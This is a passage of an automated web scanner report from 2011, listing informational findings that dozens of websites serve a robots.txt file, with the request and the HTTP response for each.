27.534. http://www.etravelmaine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etravelmaine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etravelmaine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:10 GMT
Server: Apache
Last-Modified: Wed, 17 Mar 2010 15:26:04 GMT
ETag: "6b8154-c1-4ba0f48c"
Accept-Ranges: bytes
Content-Length: 193
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /pma/
Disallow: /pma.ba/
Disallow: /.htaccess
Disallow: /data.txt
Disallow: /error_document.htaccess
Disallow: /z.txt

Sitemap: http://www.etravelmaine.com/sitemap.xml

27.535. http://www.europcar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.europcar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.europcar.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 04 May 2011 03:32:08 GMT
Content-Length: 69
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.europcar.com/sitemap.xml

27.536. http://www.evanscycles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evanscycles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evanscycles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:16 GMT
Server: Apache/2.2.3 (Debian) DAV/2 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Fri, 03 Sep 2010 11:21:22 GMT
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /paypal/

27.537. http://www.eveningtribune.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eveningtribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eveningtribune.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:12 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
Age: 62
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache3.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache3.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

27.538. http://www.evergreenps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evergreenps.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evergreenps.org

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 04:07:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.4518
X-Powered-By: ASP.NET
Last-Modified: Tue, 07 Dec 2010 22:26:37 GMT
ETag: "{2ABBBD94-EF6F-4C5A-A689-A1162651EB08},5"
ResourceTag: rt:2ABBBD94-EF6F-4C5A-A689-A1162651EB08@00000000005
Content-Type: text/plain
Exires: Tue, 19 Apr 2011 04:07:48 GMT
Cache-Control: private,max-age=0
Content-Length: 392
Public-Extension: http://schemas.microsoft.com/repl-2

User-Agent: *
Disallow: /Search/
Disallow: /_layouts/
Disallow: /Documents/
Disallow: /Form%20Templates/
Disallow: /HiddenPages/
Disallow: /Hidden%20Pages/
Disallow: /Style%20Library/
Disallow
...[SNIP]...

27.539. http://www.everyonedoesit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everyonedoesit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.everyonedoesit.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Oct 2008 11:58:41 GMT
Accept-Ranges: bytes
ETag: "fe3fb1dbcf35c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:58 GMT
Connection: close
Content-Length: 272

# Robots.txt file created by http://www.everyonedoesit.co.uk
# For domain: http://www.everyonedoesit.co.uk

# All robots will spider the domain
User-agent: *
Disallow: /about_EDIT/terms_condition
...[SNIP]...

27.540. http://www.everystudent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everystudent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.everystudent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:30 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 17:44:28 GMT
Accept-Ranges: bytes
Content-Length: 183
Cache-Control: max-age=172800
Expires: Fri, 06 May 2011 02:56:30 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /getpersonal/
Disallow: /features/followup.html
Disallow: /features/country_followup.html
Disallow: /videocontest.html
Disallow: /smart/features/followup.html

27.541. http://www.evilhub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evilhub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.evilhub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 24 Apr 2010 10:21:12 GMT
ETag: "6578012-8c-e72bb600"
Accept-Ranges: bytes
Content-Length: 140
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /content/
Disallow: /ftp_content/
Disallow: /includes/
Disallow: /process/

27.542. http://www.excitingmatures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.excitingmatures.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.excitingmatures.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 23:01:37 GMT
Server: Apache/2
Last-Modified: Thu, 05 Nov 2009 09:58:19 GMT
ETag: "11d0003-65-4779cc44fa4c0"
Accept-Ranges: bytes
Content-Length: 101
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:/tops/
Disallow:/proton/
Disallow:/cgi-bin/
Disallow:/out.php
Disallow:/st/



27.543. http://www.exiledonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exiledonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.exiledonline.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:05:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,Cookie
X-Pingback: http://exiledonline.com/xmlrpc.php
Cache-Control: max-age=600, private, must-revalidate
Expires: Wed, 04 May 2011 02:05:57 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://exiledonline.com/sitemap.xml.gz

27.544. http://www.explorebranson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.explorebranson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.explorebranson.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Last-Modified: Mon, 12 Oct 2009 21:39:55 GMT
ETag: "1070564-48-475c3c53ca0c0"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /portal/
Disallow: /search/
Disallow: /e-offer/

27.545. http://www.exportersindia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exportersindia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.exportersindia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:17 GMT
Server: Apache/2.2.10 (Fedora)
Last-Modified: Thu, 17 Feb 2011 07:56:29 GMT
ETag: "3ea4a3-1ba-49c75bc2cc540"
Accept-Ranges: bytes
Content-Length: 442
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

#Robots.txt for ExportersIndia.com
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
User-agent: *
Disallow: /banner/
Disallow: /misc/
Disallow: /transfer-files/
Disallow: /iyp
...[SNIP]...

27.546. http://www.extravaluechecks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.extravaluechecks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extravaluechecks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 28 Oct 2010 16:12:55 GMT
ETag: "38c8060-50-493af9d550fc0"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

sitemap: http://www.extravaluechecks.com/sitemap.xml

27.547. http://www.extreme-review.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.extreme-review.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extreme-review.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Wed, 04 May 2011 01:39:38 GMT
Content-Type: text/plain
Content-Length: 57
Last-Modified: Fri, 12 Feb 2010 18:15:41 GMT
Connection: close
Expires: Fri, 03 Jun 2011 01:39:38 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /vote.php
Disallow: /vote.php?id=

27.548. http://www.extremeoverclocking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.extremeoverclocking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.extremeoverclocking.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:13 GMT
Server: Apache
Last-Modified: Tue, 18 Oct 2005 18:15:37 GMT
ETag: "1050346-a1-4036b4f7fc440"
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

User-agent: psbot
Disallow: /

User-agent: *
Disallow: /contact_info.php
Disallow: /contact_info.html
Disallow: /lists/

27.549. http://www.ezinemark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezinemark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezinemark.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:51:12 GMT
Server: Apache
Last-Modified: Fri, 27 Nov 2009 02:01:27 GMT
ETag: "15f010e-26-47950ab696bc0"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /u/
Allow: /


27.550. http://www.ezstream.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezstream.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezstream.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 25 Jun 2009 13:19:13 GMT
Accept-Ranges: bytes
ETag: "3eadb68897f5c91:1a95"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:39:52 GMT
Connection: close

User-agent: *
Disallow: /

27.551. http://www.fabrics-store.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fabrics-store.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fabrics-store.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:46 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 11 Mar 2007 04:56:33 GMT
ETag: "394c8d1-9b-7b0a4240"
Accept-Ranges: bytes
Content-Length: 155
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /admin/
Disallow: /images/
Disallow: /inventory/
Disallow: /items/
Disallow: /reports/

27.552. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.167.34
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.553. http://www.facebooklogin.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebooklogin.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebooklogin.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:37:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 23 Jul 2010 03:06:05 GMT
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

27.554. http://www.factorydirectcellular.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factorydirectcellular.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.factorydirectcellular.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:13 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 01 Aug 2003 17:53:18 GMT
ETag: "82-3c3d8b211df80"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /_borders
Disallow: /_themes
Disallow: /_private
Disallow: /_derived

27.555. http://www.family.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.family.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.family.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Location: http://www.family.org/robots.txt
Last-Modified: Wed, 17 Dec 2008 16:42:28 GMT
Accept-Ranges: bytes
ETag: "4ed5b736660c91:1bf98"
Server: Microsoft-IIS/6.0
ID: w3
X-Powered-By: ASP.NET
Connection: close
Date: Wed, 04 May 2011 01:33:26 GMT
Age: 217
Content-Length: 3979

User-agent: rightnow_webindexer
Disallow:
User-agent: *
Disallow: /email-profile/
Disallow: http://dvlp.family.org*
Disallow: /adfeature/
Disallow: /avassets/audio/
Disallow: /books/
Disallow:
...[SNIP]...

27.556. http://www.familyoldphotos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familyoldphotos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.familyoldphotos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:02:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Last-Modified: Mon, 07 Feb 2011 18:46:57 GMT
ETag: "2c2ff9-629-49bb5a8030a40"
Accept-Ranges: bytes
Content-Length: 1577
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.557. http://www.fanartreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanartreview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanartreview.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:55:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Feb 2011 12:43:43 GMT
ETag: "551a86d-31-49c010c5a7dc0"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Crawl-delay: 5

27.558. http://www.fanciers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fanciers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fanciers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:30 GMT
Server: Apache
Last-Modified: Sun, 06 Jun 2010 01:02:41 GMT
ETag: "4504d8-130-4c0af3b1"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.559. http://www.fancydress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fancydress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fancydress.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:36:29 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: ad_session_id=1149333464%2c0%2c0+%7b428+1304477874+E28464142DC613426624C43F9C31373B9C054CE7%7d; Path=/; Max-Age=1200; Expires=Wed, 04-May-2011 02:57:54 GMT
Last-Modified: Wed, 25 Aug 2010 15:07:46 GMT
MIME-Version: 1.0
Content-Length: 144

User-agent: *
Disallow: /doc/
Disallow: /api-doc/
Disallow: /files/
Disallow: /register/
Disallow: /SYSTEM/
Disallow: /costumes/email_prod_link

27.560. http://www.fantes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fantes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fantes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:20:53 GMT
Server: Apache
Last-Modified: Fri, 16 Oct 2009 04:42:00 GMT
ETag: "106b494-12a-4ad7f998"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi/
Disallow: /Library/
Disallow: /music/
Disallow: /stats/
Disallow: /styles/
Disallow: /404.html
Disallow: /message.html
Disallow: /new_stuff.html
Disallow: /returns.html
D
...[SNIP]...

27.561. http://www.fareguru.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fareguru.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fareguru.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 04:07:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/plain
Content-Length: 143

User-agent: *
Disallow: /js/
Disallow: /js2/
Disallow: /scripts/
Disallow: /css2/
Disallow: /styles/
Disallow: /ax/
Disallow: /images/

27.562. http://www.fashion.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashion.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fashion.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:23 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.5 mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.30
Last-Modified: Thu, 19 Aug 2004 05:04:31 GMT
ETag: "d0143-18-412434df"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.563. http://www.fashionmodeldirectory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashionmodeldirectory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fashionmodeldirectory.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:26 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html

User-agent: *
Sitemap: http://www.fashionmodeldirectory.com/sitemap_index.xml

Disallow:*&redir=*

User-agent: Mediapartners-Google*
Disallow:/fashion_directory/visit/

27.564. http://www.fastmail.fm/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastmail.fm
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fastmail.fm

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Wed, 04 May 2011 03:27:29 GMT
Content-Type: text/plain
Content-Length: 179
Last-Modified: Wed, 13 Apr 2011 06:07:32 GMT
Connection: close
Expires: Wed, 11 May 2011 03:27:29 GMT
Cache-Control: max-age=604800
Cache-Control: public
Accept-Ranges: bytes

User-agent: *
Disallow: /mail1
Disallow: /mail2
Disallow: /mail3
Disallow: /mail4
Disallow: /beta
Disallow: /web5
Disallow: /web6
Disallow: /web7
Disallow: /web8
Disallow: /SOAP


27.565. http://www.fathermag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fathermag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fathermag.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:06 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8+etch16 mod_ruby/1.2.6 Ruby/1.8.5(2006-08-25) mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Mon, 24 Nov 2008 08:27:22 GMT
ETag: "1c9ea-ad-29f4ae80"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.fathermag.com/

User-agent: *
Disallow: /ads/
Disallow: /plesk-stat/ # statistics
Disallow: /stats/ # statistics
Disallow: /style/ # stylesheets

27.566. http://www.fccj.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fccj.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fccj.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:34 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.24
Last-Modified: Tue, 12 Oct 2010 17:30:12 GMT
ETag: "4944-1e0-4cb49b24"
Accept-Ranges: bytes
Content-Length: 480
Connection: close
Content-Type: text/plain

#
# robots.txt for http://www.fccj.org/
#
# $Id: robots.txt,v 0.01 1998/10/06 21:15 Sneex Exp $
#

User-agent: *
Disallow: /        # This is restricted to FCCJ Webmaster only
Disallow: /~bill    # This is res
...[SNIP]...

27.567. http://www.fcps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fcps.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fcps.org

Response

HTTP/1.1 200 OK
Content-Length: 1951
Content-Type: text/plain
Last-Modified: Tue, 18 Sep 2007 03:56:42 GMT
Accept-Ranges: bytes
ETag: "9e9c82eca7f9c71:8b4f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:45:52 GMT
Connection: close

User-agent: *
Disallow: /fcps/adm/
Disallow: /fcps/Admin/
Disallow: /fcps/Admin_DSF/
Disallow: /fcps/BulkMail_Admin/
Disallow: /fcps/Chat/
Disallow: /fcps/colors/
Disallow: /fcps/CWP_Admin/
Di
...[SNIP]...

27.568. http://www.fearthesword.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fearthesword.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fearthesword.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:51:47 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "466129-d0-49e83f7963aa4"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.569. http://www.fellowes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fellowes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fellowes.com

Response

HTTP/1.1 200 OK
Content-Length: 609
Content-Type: text/plain
Last-Modified: Tue, 04 May 2010 19:58:21 GMT
Accept-Ranges: bytes
ETag: "77da2026c4ebca1:d67"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:49 GMT
Connection: close

user-agent: Xenu Link Sleuth 1.3c
Disallow: /ca/
Disallow: /ch/
Disallow: /cs/
Disallow: /de/
Disallow: /es/
Disallow: /fr/
Disallow: /gb/
Disallow: /nl/
Disallow: /it/
Disallow: /row/
Dis
...[SNIP]...

27.570. http://www.femaleguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.femaleguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.femaleguard.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Thu, 28 Apr 2011 13:54:28 GMT
Accept-Ranges: bytes
ETag: "80e96caab5cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:13:36 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.571. http://www.ferrellgas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ferrellgas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ferrellgas.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=UPKKWVS172.30.5.27CKKYW; path=/
Connection: close
Date: Wed, 04 May 2011 02:05:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 162

# robots.txt file for FRLLEGSWEB

User-agent: *
Disallow: /manage/
Disallow: /app_/
Disallow: /WebResource.axd

# last updated 2009-01-23 by Nagraa

27.572. http://www.fhainfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fhainfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fhainfo.com

Response

HTTP/1.1 200 OK
Content-Length: 632
Content-Type: text/plain
Last-Modified: Fri, 04 Dec 2009 16:04:26 GMT
Accept-Ranges: bytes
ETag: "e093bb73fb74ca1:433bd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Wed, 04 May 2011 00:41:07 GMT
Connection: close

# For domain: http://www.fhainfo.com

# All robots will spider the domain
User-agent: *
Disallow:

# Disallow directory /_private/
User-agent: *
Disallow: /_private/

# Disallow directory /m
...[SNIP]...

